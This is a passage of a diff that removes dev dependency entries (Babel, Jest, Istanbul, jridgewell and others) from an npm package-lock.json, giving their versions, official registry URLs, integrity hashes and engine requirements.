"sha512-AsUnxuLhRYsisFiaJwvp1QF+I3KjD5FOxut14q/GzovUe6orHLesW2C7d754kRm53h5gqrz6sFl6sxc4BVtE/g==", - "dev": true, - "dependencies": { - "@babel/types": "^7.22.5" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helper-string-parser": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-string-parser/-/helper-string-parser-7.22.5.tgz", - "integrity": "sha512-mM4COjgZox8U+JcXQwPijIZLElkgEpO5rsERVDJTc2qfCDfERyob6k5WegS14SX18IIjv+XD+GrqNumY5JRCDw==", - "dev": true, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helper-validator-identifier": { - "version": "7.22.20", - "resolved": "https://registry.npmjs.org/@babel/helper-validator-identifier/-/helper-validator-identifier-7.22.20.tgz", - "integrity": "sha512-Y4OZ+ytlatR8AI+8KZfKuL5urKp7qey08ha31L8b3BwewJAoJamTzyvxPR/5D+KkdJCGPq/+8TukHBlY10FX9A==", - "dev": true, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helper-validator-option": { - "version": "7.18.6", - "resolved": "https://registry.npmjs.org/@babel/helper-validator-option/-/helper-validator-option-7.18.6.tgz", - "integrity": "sha512-XO7gESt5ouv/LRJdrVjkShckw6STTaB7l9BrpBaAHDeF5YZT+01PCwmR0SJHnkW6i8OwW/EVWRShfi4j2x+KQw==", - "dev": true, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helpers": { - "version": "7.20.13", - "resolved": "https://registry.npmjs.org/@babel/helpers/-/helpers-7.20.13.tgz", - "integrity": "sha512-nzJ0DWCL3gB5RCXbUO3KIMMsBY2Eqbx8mBpKGE/02PgyRQFcPQLbkQ1vyy596mZLaP+dAfD+R4ckASzNVmW3jg==", - "dev": true, - "dependencies": { - "@babel/template": "^7.20.7", - "@babel/traverse": "^7.20.13", - "@babel/types": "^7.20.7" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/highlight": { - "version": "7.22.20", - "resolved": "https://registry.npmjs.org/@babel/highlight/-/highlight-7.22.20.tgz", - "integrity": "sha512-dkdMCN3py0+ksCgYmGG8jKeGA/8Tk+gJwSYYlFGxG5lmhfKNoAy004YpLxpS1W2J8m/EK2Ew+yOs9pVRwO89mg==", - "dev": true, - "dependencies": { - "@babel/helper-validator-identifier": "^7.22.20", - "chalk": "^2.4.2", - "js-tokens": "^4.0.0" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/highlight/node_modules/ansi-styles": { - "version": "3.2.1", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-3.2.1.tgz", - "integrity": "sha512-VT0ZI6kZRdTh8YyJw3SMbYm/u+NqfsAxEpWO0Pf9sq8/e94WxxOpPKx9FR1FlyCtOVDNOQ+8ntlqFxiRc+r5qA==", - "dev": true, - "dependencies": { - "color-convert": "^1.9.0" - }, - "engines": { - "node": ">=4" - } - }, - "node_modules/@babel/highlight/node_modules/chalk": { - "version": "2.4.2", - "resolved": "https://registry.npmjs.org/chalk/-/chalk-2.4.2.tgz", - "integrity": "sha512-Mti+f9lpJNcwF4tWV8/OrTTtF1gZi+f8FqlyAdouralcFWFQWF2+NgCHShjkCb+IFBLq9buZwE1xckQU4peSuQ==", - "dev": true, - "dependencies": { - "ansi-styles": "^3.2.1", - "escape-string-regexp": "^1.0.5", - "supports-color": "^5.3.0" - }, - "engines": { - "node": ">=4" - } - }, - "node_modules/@babel/highlight/node_modules/color-convert": { - "version": "1.9.3", - "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-1.9.3.tgz", - "integrity": "sha512-QfAUtd+vFdAtFQcC8CCyYt1fYWxSqAiK2cSD6zDB8N3cpsEBAvRxp9zOGg6G/SHHJYAT88/az/IuDGALsNVbGg==", - "dev": true, - "dependencies": { - "color-name": "1.1.3" - } - }, - "node_modules/@babel/highlight/node_modules/color-name": { - "version": "1.1.3", - "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.3.tgz", - "integrity": "sha512-72fSenhMw2HZMTVHeCA9KCmpEIbzWiQsjN+BHcBbS9vr1mtt+vJjPdksIBNUmKAW8TFUDPJK5SUU3QhE9NEXDw==", - "dev": true - }, - "node_modules/@babel/highlight/node_modules/escape-string-regexp": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-1.0.5.tgz", - "integrity": "sha512-vbRorB5FUQWvla16U8R/qgaFIya2qGzwDrNmCZuYKrbdSUMG6I1ZCGQRefkRVhuOkIGVne7BQ35DSfo1qvJqFg==", - "dev": true, - "engines": { - "node": ">=0.8.0" - } - }, - "node_modules/@babel/highlight/node_modules/has-flag": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-3.0.0.tgz", - "integrity": "sha512-sKJf1+ceQBr4SMkvQnBDNDtf4TXpVhVGateu0t918bl30FnbE2m4vNLX+VWe/dpjlb+HugGYzW7uQXH98HPEYw==", - "dev": true, - "engines": { - "node": ">=4" - } - }, - "node_modules/@babel/highlight/node_modules/supports-color": { - "version": "5.5.0", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-5.5.0.tgz", - "integrity": "sha512-QjVjwdXIt408MIiAqCX4oUKsgU2EqAGzs2Ppkm4aQYbjm+ZEWEcW4SfFNTr4uMNZma0ey4f5lgLrkB0aX0QMow==", - "dev": true, - "dependencies": { - "has-flag": "^3.0.0" - }, - "engines": { - "node": ">=4" - } - }, - "node_modules/@babel/parser": { - "version": "7.23.0", - "resolved": "https://registry.npmjs.org/@babel/parser/-/parser-7.23.0.tgz", - "integrity": "sha512-vvPKKdMemU85V9WE/l5wZEmImpCtLqbnTvqDS2U1fJ96KrxoW7KrXhNsNCblQlg8Ck4b85yxdTyelsMUgFUXiw==", - "dev": true, - "bin": { - "parser": "bin/babel-parser.js" - }, - "engines": { - "node": ">=6.0.0" - } - }, - "node_modules/@babel/plugin-syntax-async-generators": { - "version": "7.8.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-async-generators/-/plugin-syntax-async-generators-7.8.4.tgz", - "integrity": "sha512-tycmZxkGfZaxhMRbXlPXuVFpdWlXpir2W4AMhSJgRKzk/eDlIXOhb2LHWoLpDF7TEHylV5zNhykX6KAgHJmTNw==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-bigint": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-bigint/-/plugin-syntax-bigint-7.8.3.tgz", - "integrity": "sha512-wnTnFlG+YxQm3vDxpGE57Pj0srRU4sHE/mDkt1qv2YJJSeUAec2ma4WLUnUPeKjyrfntVwe/N6dCXpU+zL3Npg==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-class-properties": { - "version": "7.12.13", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-class-properties/-/plugin-syntax-class-properties-7.12.13.tgz", - "integrity": "sha512-fm4idjKla0YahUNgFNLCB0qySdsoPiZP3iQE3rky0mBUtMZ23yDJ9SJdg6dXTSDnulOVqiF3Hgr9nbXvXTQZYA==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.12.13" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-import-meta": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-import-meta/-/plugin-syntax-import-meta-7.10.4.tgz", - "integrity": "sha512-Yqfm+XDx0+Prh3VSeEQCPU81yC+JWZ2pDPFSS4ZdpfZhp4MkFMaDC1UqseovEKwSUpnIL7+vK+Clp7bfh0iD7g==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.10.4" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-json-strings": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-json-strings/-/plugin-syntax-json-strings-7.8.3.tgz", - "integrity": "sha512-lY6kdGpWHvjoe2vk4WrAapEuBR69EMxZl+RoGRhrFGNYVK8mOPAW8VfbT/ZgrFbXlDNiiaxQnAtgVCZ6jv30EA==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-jsx": { - "version": "7.18.6", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-jsx/-/plugin-syntax-jsx-7.18.6.tgz", - "integrity": "sha512-6mmljtAedFGTWu2p/8WIORGwy+61PLgOMPOdazc7YoJ9ZCWUyFy3A6CpPkRKLKD1ToAesxX8KGEViAiLo9N+7Q==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.18.6" - }, - "engines": { - "node": ">=6.9.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-logical-assignment-operators": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-logical-assignment-operators/-/plugin-syntax-logical-assignment-operators-7.10.4.tgz", - "integrity": "sha512-d8waShlpFDinQ5MtvGU9xDAOzKH47+FFoney2baFIoMr952hKOLp1HR7VszoZvOsV/4+RRszNY7D17ba0te0ig==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.10.4" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-nullish-coalescing-operator": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-nullish-coalescing-operator/-/plugin-syntax-nullish-coalescing-operator-7.8.3.tgz", - "integrity": "sha512-aSff4zPII1u2QD7y+F8oDsz19ew4IGEJg9SVW+bqwpwtfFleiQDMdzA/R+UlWDzfnHFCxxleFT0PMIrR36XLNQ==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-numeric-separator": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-numeric-separator/-/plugin-syntax-numeric-separator-7.10.4.tgz", - "integrity": "sha512-9H6YdfkcK/uOnY/K7/aA2xpzaAgkQn37yzWUMRK7OaPOqOpGS1+n0H5hxT9AUw9EsSjPW8SVyMJwYRtWs3X3ug==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.10.4" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-object-rest-spread": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-object-rest-spread/-/plugin-syntax-object-rest-spread-7.8.3.tgz", - "integrity": "sha512-XoqMijGZb9y3y2XskN+P1wUGiVwWZ5JmoDRwx5+3GmEplNyVM2s2Dg8ILFQm8rWM48orGy5YpI5Bl8U1y7ydlA==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-optional-catch-binding": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-optional-catch-binding/-/plugin-syntax-optional-catch-binding-7.8.3.tgz", - "integrity": "sha512-6VPD0Pc1lpTqw0aKoeRTMiB+kWhAoT24PA+ksWSBrFtl5SIRVpZlwN3NNPQjehA2E/91FV3RjLWoVTglWcSV3Q==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-optional-chaining": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-optional-chaining/-/plugin-syntax-optional-chaining-7.8.3.tgz", - "integrity": "sha512-KoK9ErH1MBlCPxV0VANkXW2/dw4vlbGDrFgz8bmUsBGYkFRcbRwMh6cIJubdPrkxRwuGdtCk0v/wPTKbQgBjkg==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-top-level-await": { - "version": "7.14.5", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-top-level-await/-/plugin-syntax-top-level-await-7.14.5.tgz", - "integrity": "sha512-hx++upLv5U1rgYfwe1xBQUhRmU41NEvpUvrp8jkrSCdvGSnM5/qdRMtylJ6PG5OFkBaHkbTAKTnd3/YyESRHFw==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.14.5" - }, - "engines": { - "node": ">=6.9.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-typescript": { - "version": "7.20.0", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-typescript/-/plugin-syntax-typescript-7.20.0.tgz", - "integrity": "sha512-rd9TkG+u1CExzS4SM1BlMEhMXwFLKVjOAFFCDx9PbX5ycJWDoWMcwdJH9RhkPu1dOgn5TrxLot/Gx6lWFuAUNQ==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.19.0" - }, - "engines": { - "node": ">=6.9.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/template": { - "version": "7.22.15", - "resolved": "https://registry.npmjs.org/@babel/template/-/template-7.22.15.tgz", - "integrity": "sha512-QPErUVm4uyJa60rkI73qneDacvdvzxshT3kksGqlGWYdOTIUOwJ7RDUL8sGqslY1uXWSL6xMFKEXDS3ox2uF0w==", - "dev": true, - "dependencies": { - "@babel/code-frame": "^7.22.13", - "@babel/parser": "^7.22.15", - "@babel/types": "^7.22.15" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/traverse": { - "version": "7.23.2", - "resolved": "https://registry.npmjs.org/@babel/traverse/-/traverse-7.23.2.tgz", - "integrity": "sha512-azpe59SQ48qG6nu2CzcMLbxUudtN+dOM9kDbUqGq3HXUJRlo7i8fvPoxQUzYgLZ4cMVmuZgm8vvBpNeRhd6XSw==", - "dev": true, - "dependencies": { - "@babel/code-frame": "^7.22.13", - "@babel/generator": "^7.23.0", - "@babel/helper-environment-visitor": "^7.22.20", - "@babel/helper-function-name": "^7.23.0", - "@babel/helper-hoist-variables": "^7.22.5", - "@babel/helper-split-export-declaration": "^7.22.6", - "@babel/parser": "^7.23.0", - "@babel/types": "^7.23.0", - "debug": "^4.1.0", - "globals": "^11.1.0" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/types": { - "version": "7.23.0", - "resolved": "https://registry.npmjs.org/@babel/types/-/types-7.23.0.tgz", - "integrity": "sha512-0oIyUfKoI3mSqMvsxBdclDwxXKXAUA8v/apZbc+iSyARYou1o8ZGDxbUYyLFoW2arqS2jDGqJuZvv1d/io1axg==", - "dev": true, - "dependencies": { - "@babel/helper-string-parser": "^7.22.5", - "@babel/helper-validator-identifier": "^7.22.20", - "to-fast-properties": "^2.0.0" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@bcoe/v8-coverage": { - "version": "0.2.3", - "resolved": "https://registry.npmjs.org/@bcoe/v8-coverage/-/v8-coverage-0.2.3.tgz", - "integrity": "sha512-0hYQ8SB4Db5zvZB4axdMHGwEaQjkZzFjQiN9LVYvIFB2nSUHW9tYpxWriPrWDASIxiaXax83REcLxuSdnGPZtw==", - "dev": true - }, - "node_modules/@istanbuljs/load-nyc-config": { - "version": "1.1.0", - "resolved": "https://registry.npmjs.org/@istanbuljs/load-nyc-config/-/load-nyc-config-1.1.0.tgz", - "integrity": "sha512-VjeHSlIzpv/NyD3N0YuHfXOPDIixcA1q2ZV98wsMqcYlPmv2n3Yb2lYP9XMElnaFVXg5A7YLTeLu6V84uQDjmQ==", - "dev": true, - "dependencies": { - "camelcase": "^5.3.1", - "find-up": "^4.1.0", - "get-package-type": "^0.1.0", - "js-yaml": "^3.13.1", - "resolve-from": "^5.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/@istanbuljs/schema": { - "version": "0.1.3", - "resolved": "https://registry.npmjs.org/@istanbuljs/schema/-/schema-0.1.3.tgz", - "integrity": "sha512-ZXRY4jNvVgSVQ8DL3LTcakaAtXwTVUxE81hslsyD2AtoXW/wVob10HkOJ1X/pAlcI7D+2YoZKg5do8G/w6RYgA==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/@jest/console": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/@jest/console/-/console-29.4.1.tgz", - "integrity": "sha512-m+XpwKSi3PPM9znm5NGS8bBReeAJJpSkL1OuFCqaMaJL2YX9YXLkkI+MBchMPwu+ZuM2rynL51sgfkQteQ1CKQ==", - "dev": true, - "dependencies": { - "@jest/types": "^29.4.1", - "@types/node": "*", - "chalk": "^4.0.0", - "jest-message-util": "^29.4.1", - "jest-util": "^29.4.1", - "slash": "^3.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/core": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/@jest/core/-/core-29.4.1.tgz", - "integrity": "sha512-RXFTohpBqpaTebNdg5l3I5yadnKo9zLBajMT0I38D0tDhreVBYv3fA8kywthI00sWxPztWLD3yjiUkewwu/wKA==", - "dev": true, - "dependencies": { - "@jest/console": "^29.4.1", - "@jest/reporters": "^29.4.1", - "@jest/test-result": "^29.4.1", - "@jest/transform": "^29.4.1", - "@jest/types": "^29.4.1", - "@types/node": "*", - "ansi-escapes": "^4.2.1", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "exit": "^0.1.2", - "graceful-fs": "^4.2.9", - "jest-changed-files": "^29.4.0", - "jest-config": "^29.4.1", - "jest-haste-map": "^29.4.1", - "jest-message-util": "^29.4.1", - "jest-regex-util": "^29.2.0", - "jest-resolve": "^29.4.1", - "jest-resolve-dependencies": "^29.4.1", - "jest-runner": "^29.4.1", - "jest-runtime": "^29.4.1", - "jest-snapshot": "^29.4.1", - "jest-util": "^29.4.1", - "jest-validate": "^29.4.1", - "jest-watcher": "^29.4.1", - "micromatch": "^4.0.4", - "pretty-format": "^29.4.1", - "slash": "^3.0.0", - "strip-ansi": "^6.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "node-notifier": "^8.0.1 || ^9.0.0 || ^10.0.0" - }, - "peerDependenciesMeta": { - "node-notifier": { - "optional": true - } - } - }, - "node_modules/@jest/environment": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/@jest/environment/-/environment-29.4.1.tgz", - "integrity": "sha512-pJ14dHGSQke7Q3mkL/UZR9ZtTOxqskZaC91NzamEH4dlKRt42W+maRBXiw/LWkdJe+P0f/zDR37+SPMplMRlPg==", - "dev": true, - "dependencies": { - "@jest/fake-timers": "^29.4.1", - "@jest/types": "^29.4.1", - "@types/node": "*", - "jest-mock": "^29.4.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/expect": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/@jest/expect/-/expect-29.4.1.tgz", - "integrity": "sha512-ZxKJP5DTUNF2XkpJeZIzvnzF1KkfrhEF6Rz0HGG69fHl6Bgx5/GoU3XyaeFYEjuuKSOOsbqD/k72wFvFxc3iTw==", - "dev": true, - "dependencies": { - "expect": "^29.4.1", - "jest-snapshot": "^29.4.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/expect-utils": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/@jest/expect-utils/-/expect-utils-29.4.1.tgz", - "integrity": "sha512-w6YJMn5DlzmxjO00i9wu2YSozUYRBhIoJ6nQwpMYcBMtiqMGJm1QBzOf6DDgRao8dbtpDoaqLg6iiQTvv0UHhQ==", - "dev": true, - "dependencies": { - "jest-get-type": "^29.2.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/fake-timers": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/@jest/fake-timers/-/fake-timers-29.4.1.tgz", - "integrity": "sha512-/1joI6rfHFmmm39JxNfmNAO3Nwm6Y0VoL5fJDy7H1AtWrD1CgRtqJbN9Ld6rhAkGO76qqp4cwhhxJ9o9kYjQMw==", - "dev": true, - "dependencies": { - "@jest/types": "^29.4.1", - "@sinonjs/fake-timers": "^10.0.2", - "@types/node": "*", - "jest-message-util": "^29.4.1", - "jest-mock": "^29.4.1", - "jest-util": "^29.4.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/globals": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/@jest/globals/-/globals-29.4.1.tgz", - "integrity": "sha512-znoK2EuFytbHH0ZSf2mQK2K1xtIgmaw4Da21R2C/NE/+NnItm5mPEFQmn8gmF3f0rfOlmZ3Y3bIf7bFj7DHxAA==", - "dev": true, - "dependencies": { - "@jest/environment": "^29.4.1", - "@jest/expect": "^29.4.1", - "@jest/types": "^29.4.1", - "jest-mock": "^29.4.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/reporters": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/@jest/reporters/-/reporters-29.4.1.tgz", - "integrity": "sha512-AISY5xpt2Xpxj9R6y0RF1+O6GRy9JsGa8+vK23Lmzdy1AYcpQn5ItX79wJSsTmfzPKSAcsY1LNt/8Y5Xe5LOSg==", - "dev": true, - "dependencies": { - "@bcoe/v8-coverage": "^0.2.3", - "@jest/console": "^29.4.1", - "@jest/test-result": "^29.4.1", - "@jest/transform": "^29.4.1", - "@jest/types": "^29.4.1", - "@jridgewell/trace-mapping": "^0.3.15", - "@types/node": "*", - "chalk": "^4.0.0", - "collect-v8-coverage": "^1.0.0", - "exit": "^0.1.2", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "istanbul-lib-coverage": "^3.0.0", - "istanbul-lib-instrument": "^5.1.0", - "istanbul-lib-report": "^3.0.0", - "istanbul-lib-source-maps": "^4.0.0", - "istanbul-reports": "^3.1.3", - "jest-message-util": "^29.4.1", - "jest-util": "^29.4.1", - "jest-worker": "^29.4.1", - "slash": "^3.0.0", - "string-length": "^4.0.1", - "strip-ansi": "^6.0.0", - "v8-to-istanbul": "^9.0.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "node-notifier": "^8.0.1 || ^9.0.0 || ^10.0.0" - }, - "peerDependenciesMeta": { - "node-notifier": { - "optional": true - } - } - }, - "node_modules/@jest/schemas": { - "version": "29.4.0", - "resolved": "https://registry.npmjs.org/@jest/schemas/-/schemas-29.4.0.tgz", - "integrity": "sha512-0E01f/gOZeNTG76i5eWWSupvSHaIINrTie7vCyjiYFKgzNdyEGd12BUv4oNBFHOqlHDbtoJi3HrQ38KCC90NsQ==", - "dev": true, - "dependencies": { - "@sinclair/typebox": "^0.25.16" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/source-map": { - "version": "29.2.0", - "resolved": "https://registry.npmjs.org/@jest/source-map/-/source-map-29.2.0.tgz", - "integrity": "sha512-1NX9/7zzI0nqa6+kgpSdKPK+WU1p+SJk3TloWZf5MzPbxri9UEeXX5bWZAPCzbQcyuAzubcdUHA7hcNznmRqWQ==", - "dev": true, - "dependencies": { - "@jridgewell/trace-mapping": "^0.3.15", - "callsites": "^3.0.0", - "graceful-fs": "^4.2.9" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/test-result": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/@jest/test-result/-/test-result-29.4.1.tgz", - "integrity": "sha512-WRt29Lwt+hEgfN8QDrXqXGgCTidq1rLyFqmZ4lmJOpVArC8daXrZWkWjiaijQvgd3aOUj2fM8INclKHsQW9YyQ==", - "dev": true, - "dependencies": { - "@jest/console": "^29.4.1", - "@jest/types": "^29.4.1", - "@types/istanbul-lib-coverage": "^2.0.0", - "collect-v8-coverage": "^1.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/test-sequencer": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/@jest/test-sequencer/-/test-sequencer-29.4.1.tgz", - "integrity": "sha512-v5qLBNSsM0eHzWLXsQ5fiB65xi49A3ILPSFQKPXzGL4Vyux0DPZAIN7NAFJa9b4BiTDP9MBF/Zqc/QA1vuiJ0w==", - "dev": true, - "dependencies": { - "@jest/test-result": "^29.4.1", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.4.1", - "slash": "^3.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/transform": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/@jest/transform/-/transform-29.4.1.tgz", - "integrity": "sha512-5w6YJrVAtiAgr0phzKjYd83UPbCXsBRTeYI4BXokv9Er9CcrH9hfXL/crCvP2d2nGOcovPUnlYiLPFLZrkG5Hg==", - "dev": true, - "dependencies": { - "@babel/core": "^7.11.6", - "@jest/types": "^29.4.1", - "@jridgewell/trace-mapping": "^0.3.15", - "babel-plugin-istanbul": "^6.1.1", - "chalk": "^4.0.0", - "convert-source-map": "^2.0.0", - "fast-json-stable-stringify": "^2.1.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.4.1", - "jest-regex-util": "^29.2.0", - "jest-util": "^29.4.1", - "micromatch": "^4.0.4", - "pirates": "^4.0.4", - "slash": "^3.0.0", - "write-file-atomic": "^5.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/types": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/@jest/types/-/types-29.4.1.tgz", - "integrity": "sha512-zbrAXDUOnpJ+FMST2rV7QZOgec8rskg2zv8g2ajeqitp4tvZiyqTCYXANrKsM+ryj5o+LI+ZN2EgU9drrkiwSA==", - "dev": true, - "dependencies": { - "@jest/schemas": "^29.4.0", - "@types/istanbul-lib-coverage": "^2.0.0", - "@types/istanbul-reports": "^3.0.0", - "@types/node": "*", - "@types/yargs": "^17.0.8", - "chalk": "^4.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jridgewell/gen-mapping": { - "version": "0.1.1", - "resolved": "https://registry.npmjs.org/@jridgewell/gen-mapping/-/gen-mapping-0.1.1.tgz", - "integrity": "sha512-sQXCasFk+U8lWYEe66WxRDOE9PjVz4vSM51fTu3Hw+ClTpUSQb718772vH3pyS5pShp6lvQM7SxgIDXXXmOX7w==", - "dev": true, - "dependencies": { - "@jridgewell/set-array": "^1.0.0", - "@jridgewell/sourcemap-codec": "^1.4.10" - }, - "engines": { - "node": ">=6.0.0" - } - }, - "node_modules/@jridgewell/resolve-uri": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/@jridgewell/resolve-uri/-/resolve-uri-3.1.0.tgz", - "integrity": "sha512-F2msla3tad+Mfht5cJq7LSXcdudKTWCVYUgw6pLFOOHSTtZlj6SWNYAp+AhuqLmWdBO2X5hPrLcu8cVP8fy28w==", - "dev": true, - "engines": { - "node": ">=6.0.0" - } - }, - "node_modules/@jridgewell/set-array": { - "version": "1.1.2", - "resolved": "https://registry.npmjs.org/@jridgewell/set-array/-/set-array-1.1.2.tgz", - "integrity": "sha512-xnkseuNADM0gt2bs+BvhO0p78Mk762YnZdsuzFV018NoG1Sj1SCQvpSqa7XUaTam5vAGasABV9qXASMKnFMwMw==", - "dev": true, - "engines": { - "node": ">=6.0.0" - } - }, - "node_modules/@jridgewell/sourcemap-codec": { - "version": "1.4.14", - "resolved": "https://registry.npmjs.org/@jridgewell/sourcemap-codec/-/sourcemap-codec-1.4.14.tgz", - "integrity": "sha512-XPSJHWmi394fuUuzDnGz1wiKqWfo1yXecHQMRf2l6hztTO+nPru658AyDngaBe7isIxEkRsPR3FZh+s7iVa4Uw==", - "dev": true - }, - "node_modules/@jridgewell/trace-mapping": { - "version": "0.3.17", - "resolved": "https://registry.npmjs.org/@jridgewell/trace-mapping/-/trace-mapping-0.3.17.tgz", - "integrity": "sha512-MCNzAp77qzKca9+W/+I0+sEpaUnZoeasnghNeVc41VZCEKaCH73Vq3BZZ/SzWIgrqE4H4ceI+p+b6C0mHf9T4g==", - "dev": true, - "dependencies": { - "@jridgewell/resolve-uri": "3.1.0", - "@jridgewell/sourcemap-codec": "1.4.14" - } - }, - "node_modules/@sinclair/typebox": { - "version": "0.25.21", - "resolved": "https://registry.npmjs.org/@sinclair/typebox/-/typebox-0.25.21.tgz", - "integrity": "sha512-gFukHN4t8K4+wVC+ECqeqwzBDeFeTzBXroBTqE6vcWrQGbEUpHO7LYdG0f4xnvYq4VOEwITSlHlp0JBAIFMS/g==", - "dev": true - }, - "node_modules/@sinonjs/commons": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/@sinonjs/commons/-/commons-2.0.0.tgz", - "integrity": 